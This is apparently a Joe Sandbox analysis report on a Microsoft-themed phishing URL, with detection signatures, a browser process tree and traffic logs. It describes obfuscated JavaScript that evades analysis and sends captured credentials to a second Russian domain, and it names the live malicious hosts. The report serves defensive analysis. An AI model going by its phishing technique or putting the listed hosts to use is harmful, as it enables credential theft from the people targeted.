Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://56.hanagibenewe.ru/Y7MD/

Overview

General Information

Sample URL:https://56.hanagibenewe.ru/Y7MD/
Analysis ID:1592548
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
AI detected suspicious URL
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 5856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1972,i,3349844353704011253,6770722091847730992,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 3304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://56.hanagibenewe.ru/Y7MD/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru/yeTaiyvoWfIoToESWgYLyIzyODLAMMBOZAAWVQZOPDTFIFVFPIOGGUZKZUAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://56.hanagibenewe.ru/Y7MD/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious login page. These behaviors are highly indicative of malicious intent, such as attempting to bypass security measures and potentially steal user credentials.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://56.hanagibenewe.ru/Y7MD/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script attempts to redirect the user to a suspicious domain and collects user credentials via XHR requests, which are clear indicators of malicious intent. Additionally, the script includes various anti-debugging and anti-detection mechanisms, further increasing the risk score.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://56.hanagibenewe.ru/Y7MD/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `turnstile.render()` function to render a form, and then the `tVbeRAyAuW()` function handles the form submission. This function collects user data, including the page link, and sends it to a suspicious domain (`OykLHzAM8qFHuPHxxE6QuntrNtHjjp2DjEmp0sazaSXBp2SQyq.gageodeg.ru`). If the response from this domain is '0', it then sends the form data to another suspicious domain (`../fjC2poqjpadwEYaWx9rH8ParefE8zp`). The script also includes obfuscated code and attempts to redirect the user to the `login.microsoftonline.com` domain, which is likely a phishing attempt. Overall, this script exhibits highly suspicious and malicious behavior, warranting a high-risk score.
Source: URLJoe Sandbox AI: AI detected IP in URL: https://56.hanagibenewe.ru
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: eb62a5dd-9f88-4bb7-97a8-58a9dc89ec8f92f77f1a-0143-42b7-b933-983c4bd0d583
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://56.hanagibenewe.ru/Y7MD/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: login.microsoftonline.com to https://www.office.com/login#
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.office.com to https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3a%2f%2fwww.office.com%2fv2%2fofficehome.all&response_mode=form_post&nonce=638726124374492471.zwi2mme1zgqtowy4oc00ymi3ltk3ytgtnthhowrjodllyzhmotjmnzdmmwetmde0my00mmi3lwi5mzmtotgzyzrizdbkntgz&ui_locales=en-us&mkt=en-us&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=bxnrqkx-exoygf3jufnn0j9udvvssev3zw5h59jafvtmxbt0zrhp-5dbevqbmvewpvkqysxz4gve2_ql1cx1rcqlxnzzlj-gxaqlmwkx9sawpfrq-06qdthtpxp__cmngssu3mamixvo5tjmvqcsl4dnueifz23yrtxzftcmgh54aqaasnelahc7oenqn9gu5xjoxghz_9sludc2aa0y2swqlhdwbmosf9je9nbs9ozo9sb0p8tba1fqzy6btlxybs59raa39y6uyfihyohnwa&x-client-sku=id_net8_0&x-client-ver=7.5.1.0
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Y7MD/ HTTP/1.1Host: 56.hanagibenewe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://56.hanagibenewe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
